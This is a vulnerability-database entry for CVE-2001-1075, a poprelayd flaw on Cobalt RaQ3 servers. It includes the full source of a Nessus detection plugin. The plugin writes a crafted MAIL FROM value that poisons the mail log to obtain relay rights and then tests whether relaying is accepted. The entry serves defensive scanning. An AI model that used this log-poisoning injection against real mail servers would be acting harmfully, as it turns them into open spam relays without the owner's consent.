Vulnerabilities > CVE-2001-1075 - Unspecified vulnerability in SUN Cobalt RAQ 3I

CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
PARTIAL
Availability impact
NONE
network
low complexity
sun
nessus
exploit available

Summary

poprelayd script before 2.0 in Cobalt RaQ3 servers allows remote attackers to bypass the "POP before SMTP" relay authorization. poprelayd grants relay rights to any IP address that appears in a "POP login by user" line of the mail log, and the log can be poisoned: a remote attacker causes a "POP login by user" string that includes the attacker's IP address to be written into the maillog log file (e.g. via an SMTP envelope field that the MTA logs), after which the attacker's address is treated as authenticated and the server can be used as an open mail relay.

Vulnerable Configurations

Part Description Count
Hardware
Sun
1

Exploit-Db

description: Cobalt Raq3 PopRelayD Arbitrary SMTP Relay Vulnerability. CVE-2001-1075. Remote exploit for linux platform
id: EDB-ID:20994
last seen: 2016-02-02
modified: 2001-07-04
published: 2001-07-04
reporter: Andrea Barisani
source: https://www.exploit-db.com/download/20994/
title: Cobalt Raq3 PopRelayD Arbitrary SMTP Relay Vulnerability

Nessus

NASL family: SMTP problems
NASL id: POPRELAYD_AUTH.NASL
description: Nessus has detected that the remote SMTP server allows relaying for users which were identified by 'POP before SMTP'. The access control mechanism is based on the POP server logs, which can be poisoned. Note that the plugin only runs in paranoid mode and may report a false positive on some SMTP servers, such as Postfix.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 11080
published: 2002-08-14
reporter: This script is Copyright (C) 2002-2019 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/11080
title: poprelayd & sendmail Arbitrary Mail Relay
code
#
# (C) Tenable Network Security, Inc.
#

# Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>
#      Erik Anderson <[email protected]>
#      Added BugtraqID and CVE
#
# References:
# Date:  Tue, 3 Jul 2001 19:05:10 +0200 (CEST)
# From: "Andrea Barisani" <[email protected]>
# To: [email protected]
# Subject: poprelayd and sendmail relay authentication problem (Cobalt Raq3)
#

include("compat.inc");

# Plugin registration: executed only when the engine loads the script for its
# metadata (the `description` flag is set); the actual check lives below.
if (description)
{
 script_id(11080);
 script_version("1.29");
 script_cvs_date("Date: 2019/03/06 18:38:55");

 # Vulnerability identifiers: CVE-2001-1075 / BID 2986 (poprelayd on Cobalt RaQ3).
 script_cve_id("CVE-2001-1075");
 script_bugtraq_id(2986);

 script_name(english:"poprelayd & sendmail Arbitrary Mail Relay");
 script_summary(english:"Checks if the remote mail server can be used as a spam relay.");

  script_set_attribute(attribute:"synopsis", value:
"An open SMTP relay may be running on the remote host.");
 # The finding is a relay-access bypass: poprelayd authorizes relaying from
 # addresses seen in the POP log, and that log can be poisoned remotely.
 script_set_attribute(attribute:"description", value:
"Nessus has detected that the remote SMTP server allows relaying for
users which were identified by 'POP before SMTP'. The access control
mechanism is based on the POP server logs. However, it is possible to
poison these logs, which means that any spammer could be using your
mail server to send their emails to the world, thus flooding your
network bandwidth and possibly getting your mail server blacklisted.

Note that for some SMTP servers, such as Postfix, this plugin will
display a false positive.");
 script_set_attribute(attribute:"see_also", value:"https://en.wikipedia.org/wiki/Email_spam");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2001/Jul/64");
 script_set_attribute(attribute:"solution", value:
"Disable poprelayd or upgrade it.");
 # CVSSv2 5.0 / CVSSv3 5.3: network, no auth, partial/low integrity impact
 # (unauthorized mail relay), no confidentiality or availability impact.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N");
 script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"vuln_publication_date", value:"2001/07/03");
 script_set_attribute(attribute:"plugin_publication_date", value:"2002/08/14");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 # Marked as a potential vulnerability: the check relies on timing and on the
 # exact sendmail refusal text, so it can misfire on other MTAs (see description).
 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_end_attributes();

 script_category(ACT_GATHER_INFO);
 script_family(english:"SMTP problems");

 script_copyright(english:"This script is Copyright (C) 2002-2019 Tenable Network Security, Inc.");

 # Runs after generic SMTP detection and the plain open-relay check; the
 # ParanoidReport key gates it because the test writes to the target's mail log.
 script_dependencie("smtpserver_detect.nasl", "sendmail_expn.nasl", "smtp_relay.nasl", "smtp_settings.nasl");
 script_require_keys("Settings/ParanoidReport");
 script_require_ports("Services/smtp", 25);

 exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("smtp_func.inc");

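# Paranoid-only: the check below deliberately writes a crafted line into the
# target's mail log and is known to false-positive on MTAs other than sendmail.
if (report_paranoia < 2) audit(AUDIT_PARANOID);

# Can't perform this test on localhost: the injected log line would name the
# scanner's own address, which here is the host under test.
if(islocalhost())exit(0);

port = get_service(svc:"smtp", default:25, exit_on_fail: 1);
if (get_kb_item('SMTP/'+port+'/broken')) exit(0);

soc = open_sock_tcp(port);
if (!soc) exit(0);

data = smtp_recv_banner(socket:soc);
if(!data) { close(soc); exit(0); }

# Use a third-party domain so the relay attempt is unambiguous: neither the
# sender nor the recipient belongs to the target.
domain = get_kb_item("Settings/third_party_domain");
if(!domain) domain = "nessus.org";

# Baseline: a relay attempt that a correctly configured server must refuse.
hel = string("HELO ", domain, "\r\n");
send(socket:soc, data:hel);
data = recv_line(socket:soc, length:1024);
mf1 = string("MAIL FROM: <test_1@", domain, ">\r\n");
send(socket:soc, data:mf1);
data = recv_line(socket:soc, length:1024);
rc1 = string("RCPT TO: <test_2@", domain, ">\r\n");
send(socket:soc, data: rc1);
data = recv_line(socket:soc, length:1024);
# The sendmail/poprelayd refusal text is the expected answer. If the server
# instead accepts the recipient outright it is already an open relay (covered
# by smtp_relay.nasl), so there is nothing for this plugin to prove.
if (!("Relaying denied. Please check your mail first." >< data) &&
    ereg(pattern:"^250 .*", string:data))
{
  close(soc);
  exit(0);
}

# Log poisoning: the envelope sender is crafted so that, once sendmail writes
# it to the mail log, the line carries the 'POP login by user "..." at (IP)'
# pattern poprelayd scans for, with the scanner's address in the IP position.
# Side effect of a successful run: the target whitelists the scanner's address
# for relaying (until poprelayd expires the entry - interval not known here).
q = raw_string(0x22);	# Double quote
h = compat::this_host();
mf = string("mail from:", q, "POP login by user ", q, "admin", q,
	" at (", h, ") ", h, "@example.org\r\n");
send(socket: soc, data: mf);
data = recv_line(socket:soc, length:1024);
close(soc);

# NOTE(review): poprelayd only picks the poisoned line up on its next scan of
# the log. The delay between the two connections is disabled, so a slow poll
# interval can turn a vulnerable host into a false negative here.
#
#sleep(10);
#
# Replay the identical relay attempt: if it is accepted now, the scanner's
# address was authorized solely because of the log line it injected.
soc = open_sock_tcp(port);
if (!soc) exit(0);

data = smtp_recv_banner(socket:soc);
if(!data) { close(soc); exit(0); }
send(socket:soc, data:hel);
data = recv_line(socket:soc, length:1024);
send(socket:soc, data:mf1);
data = recv_line(socket:soc, length:1024);
send(socket:soc, data: rc1);
# Only the 3-digit code and the trailing space are needed to decide.
i = recv_line(socket:soc, length:4);
if (i == "250 ") security_warning(port);
close(soc);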